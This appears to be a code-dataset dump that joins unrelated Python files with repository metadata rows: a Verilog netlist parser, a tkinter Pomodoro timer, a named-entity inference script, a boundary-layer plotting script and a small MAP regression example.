wire_re = signal_re('wire\\b');
named_connection_re = re.compile("\s*[.](\\b[a-zA-Z_][a-zA-Z0-9_]*\\b)\s*\\((.*?)\\)\s*",
re.MULTILINE | re.DOTALL | re.VERBOSE);
name_re = re.compile("\\b(?<!')([_a-zA-Z][a-zA-Z0-9_]*?|\\\\.*?\s)\\b");
class signal_declaration:
def __init__(self, src, _class, _range, _name):
self.src = src;
self._class = _class.strip();
self._range = _range.strip();
self.name = _name.strip();
def __str__(self):
if(self.src != None):
return self.src;
else:
return self._class + ' ' + self._range + ' ' + self.name;
def astype(self, _class):
return signal_declaration(None, _class, self._range, self.name);
def renamed(self, new_name):
return signal_declaration(None, self._class, self._range, new_name);
def translate_parameters(self, param_translation):
""" Given a dictionary with parameters update the range
if any parameter is found """
def trans(g):
token = g.group(1);
if(token in param_translation):
return param_translation[token];
else:
return token;
if(self.src == None):
self._range = name_re.sub(trans, self._range);
else:
self.src = name_re.sub(trans, self.src);
class module_declaration:
def __init__(self, s, src_file = None):
r = module_parts_re.match(s);
self.src = s;
self.src_file = src_file;
self.body_changed = False;
self.num_instances = 0;
if(r == None):
raise "Invalid string for a module definition";
else:
self.num_insts = 0;
self.name = r.group(1);
self.ports_string = r.group(3);
self.ports = [p.strip() for p in r.group(3).split(',')];
self.body_src = r.group(4);
self.find_inputs();
self.find_outputs();
self.find_wires();
self.find_inouts();
self.instances = {};
self.sub_blocks = {};
self.parameters = {};
for p in parameter_re.findall(self.body_src):
self.parameters[p[-2]] = p[-1].strip();
if(r.group(2) != None):
sp = r.group(2);
sp = sp[sp.index('('):len(sp) - sp[::-1].index(')') - 1];
for p in parameter_re.findall(sp):
self.parameters[p[-2]] = p[-1].strip();
def get_signal(self, name):
""" Return a signal by it's name regardless of its type. """
if(name in self.outputs):
return self.outputs[name];
if(name in self.inputs):
return self.inputs[name];
if(name in self.wires):
return self.wires[name];
if(name in self.inouts):
self.inouts[name];
def get_signal_direction(self, signal):
""" Determine the type of a signal,
based on the dictionary it is present. """
if(signal in self.outputs):
return 'output';
elif(signal in self.inputs):
return 'input';
elif(signal in self.wires):
return 'wire';
elif(signal in self.inouts):
return 'inout';
else:
return None;
def find_wires(self):
""" Using a regular expression find wires and store them
in a dictionary wires """
self.wires = {};
for w in wire_re.findall(self.body_src) + wire_re.findall(self.ports_string + ','):
self.wires[w[3]] = signal_declaration(*w);
def find_inputs(self):
""" Using a regular expression find inputs and store them
in a dictionary inputs """
self.inputs = {};
for w in input_re.findall(self.body_src) + input_re.findall(self.ports_string + ','):
self.inputs[w[3]] = signal_declaration(*w);
def find_outputs(self):
""" Using a regular expression find outputs and store them
in a dictionary outputs """
self.outputs = {};
for w in output_re.findall(self.body_src) + output_re.findall(self.ports_string + ','):
self.outputs[w[3]] = signal_declaration(*w);
def find_inouts(self):
""" Using a regular expression find inouts and store them
in a dictionary inouts """
self.inouts = {};
for w in inout_re.findall(self.body_src) + inout_re.findall(self.ports_string + ','):
self.inouts[w[3]] = signal_declaration(*w);
def __str__(self):
if(self.body_changed):
sm = "module " + self.name;
sm += self.parameter_declaration_v2001();
sm += '\n(\n' + self.port_list_string() + '\n);\n '
sm += self.parameter_declaration_v95();
sm += self.signal_declarations_string();
sm += ''.join(['\n ' + str(e).strip() + ';' for e in self.instances.values()])
sm += '\n\nendmodule\n\n'
return sm;
else:
return self.src + '\n';
def link(self, dict):
""" This routine find instances in the module body
and replace when possible with an object representing
that instance, based on the available modules, passed
via dict argument.
"""
insts = instance_re.findall(self.body_src);
for i in insts:
s = i[0] + ' ' + i[1] + ' ' + i[2] + '(' + i[3] + ')';
if(i[0] in dict):
b = instance_declaration(src = s, ref = dict[i[0]], parent = self, name = i[2]);
self.instances[i[2]] = b;
self.sub_blocks[i[2]] = b;
else:
b = instance_declaration(src = s, ref = None, parent = self, name = i[2]);
self.instances[i[2]] = b;
def move_to_chiplet(self, sub_blocks, chiplet_name, chiplet_instname = None):
c = chiplet_declaration(chiplet_name, self);
if(chiplet_instname == None):
chiplet_instname = chiplet_name;
for b in sub_blocks:
if(b in self.sub_blocks):
""" Without the variable tmp the RTL is corrupted
and it takes longer to execute """
tmp = self.sub_blocks[b];
c.include_instance(tmp)
del self.sub_blocks[b];
del self.instances[b];
else:
print "%s not found in %s" % (b, self.name);
self.sub_blocks[chiplet_name] = c.get_instanciation(parent = self, name = chiplet_instname);
self.instances[chiplet_name] = self.sub_blocks[chiplet_name];
self.body_changed = True;
return c;
def dissolve_sub_block(self, block_name, prefix = ''):
if(block_name in self.sub_blocks):
new_wires, new_insts = self.sub_blocks[block_name].get_dissolved_content(prefix = prefix);
for w in new_wires:
if(w in self.wires):
raise 'The wire %s already exists, aborted dissolving.' % w;
for i in new_insts:
if(i in self.instances):
raise 'The instance %s already exists, aborted dissolving.' % i;
""" Declares the required wires """
for w in new_wires:
self.wires[w] = new_wires[w];
""" Declare the instances from inside the subblock """
for i in new_insts:
ii = new_insts[i];
if(ii.ref != None):
self.sub_blocks[i] = ii;
self.instances[i] = ii;
""" Remove the sub block from the instances """
del self.sub_blocks[block_name];
del self.instances[block_name];
self.body_changed = True;
else:
raise 'sub_block not found, nothing to be dissolved.'
def hierarchy_tree(self, instname, f = lambda entity, inst_name: [inst_name]):
""" Create an hierarchical list containing some property
of each instance, returnded by a function f."""
r = [f(self, instname), []];
for sb in self.sub_blocks:
r[1].append(self.sub_blocks[sb].ref.hierarchy_tree(sb, f))
return r;
def parameter_declaration_v2001(self):
if(v95):
return '';
else:
if(len(self.parameters) == 0):
return '';
else:
plist = ['parameter %s = %s' % (k,v) for k,v in
zip(self.parameters.keys(), self.parameters.values())];
return "#(\n " + (',\n '.join(plist)) + ')';
def parameter_declaration_v95(self):
if(v95):
plist = ['\n parameter %s = %s;' (k,v) for k,v in
zip(self.parameters.keys(), self.parameters.values())];
return ''.join([plist]);
else:
return '';
def signal_declarations_string(self):
""" Verilog 1995 defines the types of the ports in the module body
after verilog 2001 only the wires are declared in the module
and the ports are fully declared in the port list. """
sm = '';
if(v95):
sm = '\n// Input declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.inputs.values()])
sm += '\n// Output declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.outputs.values()])
sm += '\n// INOUT declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.inouts.values()])
sm += '\n// Wire declarations\n';
sm += '\n'.join([str(w) + ';' for w in self.wires.values()])
return sm + '\n\n';
def port_list_string(self):
""" The module portlist declares ports that will be present in
the module, after verilog 2001 it also defines the type of the port """
sm = '';
if(v95):
sm += ' ' + (',\n '.join(self.inputs.keys() + self.outputs.keys() + self.inouts.keys()));
else:
sm += ',\n'.join([str(w) for w in self.inputs.values()] +
[str(w) for w in self.outputs.values()] +
[str(w) for w in self.inouts.values()]);
return sm;
def stub(self):
""" Write the same HDL struct without the instances
whose corresponding modules were not declared """
sm = "module " + self.name + '\n(\n' + ',\n '.join(self.ports) + '\n);\n '
for p in self.parameters:
sm += '\n parameter %s = %s;' % (p, self.parameters[p]);
sm += self.signal_declarations_string();
sl = [];
for e in self.sub_blocks.values():
sl.append(str(e) + ';');
sm += '\n '.join(sl);
sm += '\nendmodule\n'
return sm;
class instance_declaration:
def __init__(self, src, ref = None, parent = None,
name = None, params = None, connections = None):
if((name == None) or (params == None) or (connections == None) or (ref == None)):
g = instance_re.match(src + ';');
if(g != None):
self.params = g.group(2);
self.name = g.group(3);
self.connections = g.group(4);
self.ref_name = g.group(1);
else:
self.src = src;
self.name = name;
self.params = params;
self.connections = connections;
self.src = src;
if(ref != None):
self.ref = ref;
ref.num_instances += 1;
self.ref_name = self.ref.name;
else:
self.ref = None;
self.parent = parent;
def __str__(self):
return self.src;
def stub(self):
if(self.ref != None):
return self.src;
def get_port_connections_strings(self):
""" Retrieve the text that defines each connection """
if(self.connections == None):
return [];
pl = [s for s in named_connection_re.findall(self.connections)];
return pl;
def get_parameter_connections_strings(self):
if(self.params == None):
return [];
pl = [s for s in named_connection_re.findall(self.params)];
return pl;
def get_connections(self):
"""
return a list of the signals connected to this instance
with the directions of the port to which it is connected
- inout is dominant over input and ouput.
- output is dominant over input.
This provide the directions to the ports in a module
that whould encapsulate this instance as is.
"""
outputs = {};
inputs = {};
inouts = {};
pl = self.get_port_connections_strings();
""" Create a list of ports from signals connected to the ports """
for i in range(0, len(pl)):
""" No support for ordered connections yet """
names = [s.strip() for s in name_re.findall(pl[i][1])];
""" Process an named connection """
direction = self.ref.get_signal_direction(pl[i][0].strip());
""" Add the signal to the correct bin """
if(direction == 'output'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
outputs[n] = s.astype('output');
elif(direction == 'input'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
inputs[n] = s.astype('input');
elif(direction == 'inout'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
inouts[n] = s.astype('inout');
""" Remove inputs and outputs that also appears as inout. """
for p in inputs:
if ((p in outputs) or (p in inouts)):
del inputs[p];
""" Remove inputs that also appear as output. """
for p in outputs:
if (p in inouts):
del outputs[p];
return inputs, outputs, inouts;
def reconnect(self, signal_translation = {}, parameter_translation = {}, parent = None, prefix = ''):
def translate_signals(m):
token = m.group(1);
if(token in signal_translation):
return signal_translation[token];
elif(token in parameter_translation):
return parameter_translation[token];
else:
return prefix + token;
def translate_named_connection(m):
s = '\n .' + m.group(1) + '(';
s += name_re.sub(translate_signals, m.group(2)) + ')'
return s;
s = self.ref_name;
if(self.params != None):
s += named_connection_re.sub(translate_named_connection, self.params);
s +=' ' + prefix + self.name + '('; # instance name (now with prefix)
if(self.connections != None):
s += named_connection_re.sub(translate_named_connection, self.connections);
s += ')'
# Keep the same module as the parent of this instance.
newinst = instance_declaration(src = s, ref = self.ref,
parent = parent, name = prefix + self.name);
return newinst;
def get_resolved_parameters(self):
param_translations = {};
for p in self.ref.parameters:
param_translations[p] = '%s' % self.ref.parameters[p];
if(self.params != None):
pl = named_connection_re.findall(self.params);
for p,r in pl:
param_translations[p] = '%s' % r;
return param_translations;
def get_dissolved_content(self, prefix):
if(self.ref == None):
return None;
my_params = self.get_resolved_parameters();
""" Return a list of connected ports """
p = self.get_port_connections_strings();
my_ports = {};
for u in p:
my_ports[u[0]] = "%s" % u[1];
new_wires = {};
for w in self.ref.wires:
if(not w in my_ports):
wi = self.ref.wires[w].renamed(prefix + w);
wi.translate_parameters(my_params);
new_wires[prefix + w] = wi;
new_insts = {};
for sb in self.ref.instances:
working_inst = self.ref.instances[sb].reconnect(
parent = self.parent,
signal_translation = my_ports,
parameter_translation = my_params,
prefix = prefix
);
new_insts[prefix + '_' + sb] = working_inst;
sw = str(working_inst);
return new_wires, new_insts;
class chiplet_declaration(module_declaration):
def __init__(self, name, parent):
self.ports = [];
self.name = name;
self.parent = parent;
self.inputs = {};
self.outputs = {}
self.inouts = {};
self.wires = {};
self.sub_blocks = {};
self.instances = {};
self.parameters = {};
self.body_changed = True;
self.num_instances = 0;
def include_instance(self, inst):
"""
Insert an instance int the current chiplet,
update it's interface, and resolve conflicts
regarding port directions.
"""
i, o, io = inst.get_connections();
params = inst.get_parameter_connections_strings();
""" process instance connections """
for u in i:
self.inputs[u] = i[u];
for u in o:
self.outputs[u] = o[u];
for u in io:
self.inouts[u] = io[u];
for u in params:
for v in name_re.findall(u[1]):
self.parameters[v] = '0'; # this must be overloaded
""" Resolve conflicting port directions """
for u in self.inputs.keys():
if((u in self.outputs) or (u in self.inouts)):
del self.inputs[u];
for u in self.outputs.keys():
if(u in self.inouts):
del self.outputs[u];
# If some symbol used in port connections is a parameter
# pass it as a parameter, not as an input or output.
for plist in (i, o, io):
for p in plist:
if(p in self.parent.parameters):
del plist[p];
self.parameters[p] = 0;
else:
# Parameters used to declare signals used in the instances.
for par in name_re.findall(plist[p]._range):
self.parameters[par] = 0;
""" Update port list """
self.ports = self.inputs.keys() + self.outputs.keys() + self.inouts.keys();
""" Place instance inside the chiplet """
self.sub_blocks[inst.name] = inst;
self.instances[inst.name] = inst;
def get_instanciation(self, parent, name):
s = self.name + ' '
if(len(self.parameters) != 0):
s += "#(" + (',\n '.join(['.%s(%s)' % (p,p) for p in self.parameters])) + '\n)';
s += name + '(\n ';
s += ',\n '.join(['.%s(%s)' % (p, p) for p in self.ports]);
s += '\n)';
si = instance_declaration(src = s, ref = self, parent = parent, name = name)
return si;
class structural_parser:
def __init__(self, fname = None, no_link = False):
self.modules_by_name = {};
self.modules_by_file = {};
self.unresolved = set();
self.modules = [];
if(fname == None):
return; # supported for python2.7
# self.modules_by_name = {m.name: m for m in self.modules};
self.parse_file(fname);
if(not no_link):
self.link();
def parse_file(self, fname):
fh = open(fname);
fs = comments.sub("", fh.read());
fh.close();
tmodules = [module_declaration(s, fname) for s in module_re.findall(fs)];
self.modules_by_file[fname] = tmodules;
for m in tmodules:
self.modules_by_name[m.name] = m;
""" If the HDL was linked with unresolved
modules, then a file defining a module that was unresolved
is loaded, remove it from the list of unresolved.
however its references will be resolved only after
calling the link method. """
self.unresolved.discard(m.name)
self.modules += tmodules;
def save_hdl_file(self, fname):
if(fname in self.modules_by_file):
fh = open(fname, "w");
for m in self.modules_by_file[fname]:
fh.write(str(m));
m.body_changed = False;
fh.close();
def write_stub(self, fname):
fh = open(fname, "w");
for m in self.modules:
fh.write(m.stub());
fh.close();
def write_hdl(self, fname):
fh = open(fname, "w");
for m in self.modules:
fh.write(str(m));
fh.close();
def link(self):
""" when the modules were parsed, the list of available
modules was not available, now we are able to parse
instances and associate each instance with the corresponding
module declaration """
for m in self.modules:
m.link(self.modules_by_name);
for u in m.instances:
if(not u in m.sub_blocks):
""" Keep a set of unresolved modules """
self.unresolved.add(u);
| [
"[email protected]"
] | |
9b9d7095b47314c16a5bb2eb07d9b53a29be7d85 | e7d464c201a195cb8cbe277d9bb329955f9c6c8a | /main.py | 00e776fab18a8ed59bc5268af85e6720f651b79f | [] | no_license | OmarSadigli/Pomodoro-Timer- | 2548f3c82b96205fa70567ace32a6534c64a399d | f613a8fd5a17e07504b0040399c60b333f9634c6 | refs/heads/main | 2023-03-06T03:08:49.210071 | 2021-02-15T10:05:53 | 2021-02-15T10:05:53 | 339,034,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,629 | py | from tkinter import *
import math
# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25
SHORT_BREAK_MIN = 5
LONG_BREAK_MIN = 20
reps = 0
timer = None
# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
global reps
window.after_cancel(timer)
canvas.itemconfig(timer_text, text="00:00")
timer_label.config(text="Timer", fg=GREEN)
check_marks.config(text="", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
reps = 0
# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
global reps
work_sec = WORK_MIN * 60
short_break_sec = SHORT_BREAK_MIN * 60
long_break_sec = LONG_BREAK_MIN * 60
reps += 1
if reps % 8 == 0:
timer_label.config(text="Break", fg=RED)
count_down(long_break_sec)
elif reps % 2 == 0:
timer_label.config(text="Break", fg=PINK)
count_down(short_break_sec)
else:
timer_label.config(text="Work")
count_down(work_sec)
# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
def count_down(count):
count_min = math.floor(count / 60)
count_sec = count % 60
if count_sec < 10:
count_sec = f"0{count_sec}"
canvas.itemconfig(timer_text, text=f"{count_min}:{count_sec}")
if count > 0:
global timer
timer = window.after(1000, count_down, count - 1)
else:
start_timer()
marks = ""
for _ in range(math.floor(reps / 2)):
marks += "✔"
check_marks.config(text=marks)
# ---------------------------- UI SETUP ------------------------------- #
window = Tk()
window.title("Pomodoro")
window.config(padx=100, pady=50, bg=YELLOW)
canvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
tomato_img = PhotoImage(file="tomato.png")
canvas.create_image(100, 112, image=tomato_img)
timer_text = canvas.create_text(100, 130, text="00:00", fill="white", font=(FONT_NAME, 35, "bold"))
canvas.grid(column=1, row=1)
timer_label = Label(text="Timer", font=(FONT_NAME, 40, "bold"), fg=GREEN, bg=YELLOW)
timer_label.grid(column=1, row=0)
start_button = Button(text="Start", highlightthickness=0, command=start_timer)
start_button.grid(column=0, row=2)
reset_button = Button(text="Reset", highlightthickness=0, command=reset_timer)
reset_button.grid(column=2, row=2)
check_marks = Label(fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
check_marks.grid(column=1, row=3)
window.mainloop()
| [
"[email protected]"
] | |
be9cf6de41337a706ff9fa46d7816b99d1f552a0 | b306aab9dcea2dd83dda700bc9f7b9f1a32cff3a | /CAIL2021/slsb/main.py | f67c06674df00f1d0948662b5528d9c5174dd6c3 | [
"Apache-2.0"
] | permissive | Tulpen/CAIL | d6ca9981c7ea2603ae61675ba330a9614cd9398d | c4cfa98ab4ecedbce34a7a5a186830486047540c | refs/heads/master | 2023-04-23T20:07:56.774530 | 2021-04-16T13:18:36 | 2021-04-16T13:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,066 | py | """Test model for SMP-CAIL2020-Argmine.
Author: Tsinghuaboy [email protected]
Usage:
python main.py --model_config 'config/bert_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'bert-submission-test-1.csv'
python main.py --model_config 'config/rnn_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'rnn-submission-test-1.csv'
"""
import argparse
import itertools
import json
import os
import re
from types import SimpleNamespace
import fire
import pandas as pd
import torch
from torch.utils.data import DataLoader
from data import Data
from evaluate import evaluate, handy_tool, calculate_accuracy_f1
from model import RnnForSentencePairClassification, BertYForClassification, NERNet,NERWNet
from utils import load_torch_model
LABELS = ['1', '2', '3', '4', '5']
MODEL_MAP = {
'bert': BertYForClassification,
'rnn': NERNet,
'rnnkv': NERWNet
}
all_types = ['LAK', 'OTH', 'HYD', 'ORG', 'LOC', 'RIV', 'RES', 'TER', 'DAM', 'PER']
def result_to_json(string, tags):
item = {"string": string, "entities": []}
entity_name = ""
entity_start = 0
idx = 0
i = -1
zipped = zip(string, tags)
listzip = list(zipped)
last = len(listzip)
for char, tag in listzip:
i += 1
if tag == 0:
item["entities"].append({"word": char, "start": idx, "end": idx+1, "type":'s'})
elif (tag % 3) == 1:
entity_name += char
entity_start = idx
elif (tag % 3) == 2:
type_index = (tag-1) // 3
if (entity_name != "") and (i == last):
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
entity_name = ""
else:
entity_name += char
elif (tag % 3)+3 == 3: # or i == len(zipped)
type_index = (tag-1) // 3
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
entity_name = ""
else:
entity_name = ""
entity_start = idx
idx += 1
return item
def remove(text):
cleanr = re.compile(r"[ !#\$%&'\(\)*\+,-./:;<=>?@\^_`{|}~“”?!【】()、’‘…¥·]*")
cleantext = re.sub(cleanr, '', text)
return cleantext
def main(out_file='output/result.json',
model_config='config/rnn_config.json'):
"""Test model for given test set on 1 GPU or CPU.
Args:
in_file: file to be tested
out_file: output file
model_config: config file
"""
# 0. Load config
with open(model_config) as fin:
config = json.load(fin, object_hook=lambda d: SimpleNamespace(**d))
if torch.cuda.is_available():
device = torch.device('cuda')
# device = torch.device('cpu')
else:
device = torch.device('cpu')
#0. preprocess file
# id_list = []
# with open(in_file, 'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# id = sents['id']
# id_list.append(id)
# id_dict = dict(zip(range(len(id_list)), id_list))
# 1. Load data
data = Data(vocab_file=os.path.join(config.model_path, 'vocab.txt'),
max_seq_len=config.max_seq_len,
model_type=config.model_type, config=config)
test_set, sc_list, label_list = data.load_file(config.test_file_path, train=False)
token_list = []
for line in sc_list:
tokens = data.tokenizer.convert_ids_to_tokens(line)
token_list.append(tokens)
data_loader_test = DataLoader(
test_set, batch_size=config.batch_size, shuffle=False)
# 2. Load model
model = MODEL_MAP[config.model_type](config)
model = load_torch_model(
model, model_path=os.path.join(config.model_path, 'model.bin'))
model.to(device)
# 3. Evaluate
answer_list, length_list = evaluate(model, data_loader_test, device, isTest=True)
def flatten(ll):
return list(itertools.chain(*ll))
# train_answers = handy_tool(label_list, length_list) #gold
# #answer_list = handy_tool(answer_list, length_list) #prediction
# train_answers = flatten(train_answers)
# train_predictions = flatten(answer_list)
#
# train_acc, train_f1 = calculate_accuracy_f1(
# train_answers, train_predictions)
# print(train_acc, train_f1)
test_json = json.load(open(config.test_file_path, 'r', encoding='utf-8'))
id_list = [item['id'] for item in test_json]
mod_tokens_list = handy_tool(token_list, length_list)
result = [result_to_json(t, s) for t,s in zip(mod_tokens_list, answer_list)]
# 4. Write answers to file
with open(out_file, 'w', encoding='utf8') as fout:
result_list = []
for id, item in zip(id_list,result):
entities = item['entities']
words = [d['word']+"-"+d['type'] for d in entities if d['type'] !='s']
unique_words = []
for w in words:
if w not in unique_words:
unique_words.append(w)
item = {}
item['id'] = id
item['entities'] = unique_words
result_list.append(item)
json.dump(result_list,fout,ensure_ascii=False, indent=4)
#fout.write(" ".join(words) + "\n")
# para_list = pd.read_csv(temp_file)['para'].to_list()
# summary_dict = dict(zip(id_dict.values(), [""] * len(id_dict)))
#
# result = zip(para_list, token_list)
# for id, summary in result:
# summary_dict[id_dict[id]] += remove(summary).replace(" ","")
#
# with open(out_file, 'w', encoding='utf8') as fout:
# for id, sumamry in summary_dict.items():
# fout.write(json.dumps({'id':id,'summary':sumamry}, ensure_ascii=False) + '\n')
if __name__ == '__main__':
fire.Fire(main)
| [
"[email protected]"
] | |
d7d3b5dd82cf367f319361397028ffae52993332 | 29903a2ef2dce59ecf1c680bb7096cbe5f36a43f | /BL_plot.py | 7a7ccb5918c8513bdc0801e001a99585ce4b95a4 | [] | no_license | mkindree/Python_Code | 1af4e5e05166f3ba55052330983ef08103e30b91 | 6ae03b570085bb8c1b73fbe226806fa6914a0f38 | refs/heads/master | 2021-03-30T20:46:48.128659 | 2018-03-13T18:26:24 | 2018-03-13T18:26:24 | 125,081,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,811 | py | from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
#%%
# These options make the figure text match the default LaTex font
plt.rc('text', usetex=True)
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern'], 'size': 10})
#%% Boundary Layer data from spreadsheet
y = np.array([0.57, 0.60, 0.70, 0.80, 0.90, 1.00, 1.10, 1.20, 1.30, 1.40, 1.50,
1.70, 1.90, 2.10, 2.30, 2.50, 2.70, 2.90, 3.10, 3.30, 3.50, 4.50])
delta = 2.67
U = np.array([5.1378, 5.4314, 6.1356, 6.8619, 7.4792, 8.1326, 8.6573, 9.2868,
10.0035, 10.4333, 11.2046, 12.0477, 12.9027, 13.1515, 13.6101,
13.7471, 13.8719, 13.9032, 13.9653, 13.9828, 13.9917, 14.0058])
U_rms = np.array([0.409, 0.4041, 0.3921, 0.4099, 0.3921, 0.4301, 0.4502, 0.4146,
0.4393, 0.3442, 0.4229, 0.3521, 0.2876, 0.26, 0.1927, 0.1878,
0.1731, 0.1756, 0.1641, 0.1603, 0.164, 0.1644])
U_inf = 14.01
eta = np.array([0, 0.2, 0.4, 0.6, 0.8, 1, 1.2, 1.4, 1.6, 1.8, 2, 2.2, 2.4, 2.6,
2.8, 3, 3.2, 3.4, 3.6, 3.8, 4, 4.2, 4.4, 4.6, 4.8, 5])
eta_delta = 4.9
f_prime = np.array([0, 0.06641, 0.13277, 0.19894, 0.26471, 0.32979, 0.39378,
0.45627, 0.51676, 0.57477, 0.62977, 0.68132, 0.72899,
0.77246, 0.81152, 0.84605, 0.87609, 0.90177, 0.92333,
0.94112, 0.95552, 0.96696, 0.97587, 0.98269, 0.98779,
0.99155])
#%% Boundary Layer figure
PUBdir = r'D:\EXF Paper\EXF Paper V3\figs'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.eps'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
ax1.plot(eta/eta_delta, f_prime, 'k')
ax2 = ax1.twinx()
ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
xy1 = (0, 0.9)
xytext1 = (0.4, 0.9)
ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
arrowprops=dict(facecolor='k', edgecolor='k'))
ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
color='b', rotation='horizontal', labelpad=14)
ax2.tick_params('y', colors='b')
xy2 = (1.75, 0.6)
xytext2 = (0.9, 0.6)
ax1.annotate('', xy=xy2, xytext=xytext2,
arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
#%%
PUBdir = r'D:\NOVA Interview'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.png'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.plot(eta/eta_delta, f_prime, 'b', zorder=0)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
plt.legend(['Blasius profile', 'LDV measurements'])
#ax2 = ax1.twinx()
#ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
#xy1 = (0, 0.9)
#xytext1 = (0.4, 0.9)
#ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
# arrowprops=dict(facecolor='k', edgecolor='k'))
#ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
# color='b', rotation='horizontal', labelpad=14)
#ax2.tick_params('y', colors='b')
#xy2 = (1.75, 0.6)
#xytext2 = (0.9, 0.6)
#ax1.annotate('', xy=xy2, xytext=xytext2,
# arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
| [
"[email protected]"
] | |
a75cf2c5ccb67a5597a9c6f2f53b6994acad99ad | 29db1aec3519a22f01ef01a9eac783f0609dae4c | /Maximumposterior.py | dd480e3c77425e2f40fbfc99b846d6f87bd74f80 | [] | no_license | anirudhjack/Machine-Learning | 7ebefc52cd2326c8736fc2cb0d76ae1a7f8bde37 | c4f58a08826cb35b51ce9b0f246b6379494e64a3 | refs/heads/master | 2020-05-01T11:45:31.510779 | 2019-03-24T18:24:59 | 2019-03-24T18:24:59 | 177,450,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | import numpy as np
print(" Enter the No of training samples")
N=int(input())
x_g=np.linspace(0,2*np.pi,N)
y=np.sin(x_g)
mean=0
std=0.05
y+=np.random.normal(mean,std,N)
import matplotlib.pyplot as plt
#creating x-matrix using vstack function i.e arrange the data row wise
x=np.vstack((np.ones(N),x_g))
print("Enter the dimension:")
p=int(input())
print("Enter the value of alpha:")
alpha=float(input())
print("Enter the value of beta:")
beta=float(input())
lam=alpha/beta
print("Maximum posterior regularized lagrange multiplier:")
print(lam)
#loop for x with dimension "d"
for i in range(2,p):
x= np.vstack((x,np.power(x_g, i)))
x_p=x
#transpose of x-matrix
x=np.transpose(x)
#calculating the weight matrix
from numpy.linalg import inv
w=np.linalg.inv(x_p@x+lam*np.identity(p))@x_p@y
print("Maximum posterior weight matrix:")
print(w)
| [
"[email protected]"
] | |
fb94fc1597debf5a7a51e313349f8349d6bfb26d | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi | cc46a5a2b0b4513b177439dd5c53dfa3f3058b1e | [] | no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | pyi | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi | [
"[email protected]"
] | |
e1a70889e373ca860d381781148acddcf9e13a57 | d1ddb9e9e75d42986eba239550364cff3d8f5203 | /google-cloud-sdk/lib/googlecloudsdk/third_party/apis/cloudiot/v1beta1/cloudiot_v1beta1_client.py | b2ff82c30ed6816f1ea9058a0ee4fe9536f38a48 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | bopopescu/searchparty | 8ecd702af0d610a7ad3a8df9c4d448f76f46c450 | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | refs/heads/master | 2022-11-19T14:44:55.421926 | 2017-07-28T14:55:43 | 2017-07-28T14:55:43 | 282,495,798 | 0 | 0 | Apache-2.0 | 2020-07-25T17:48:53 | 2020-07-25T17:48:52 | null | UTF-8 | Python | false | false | 21,034 | py | """Generated client library for cloudiot version v1beta1."""
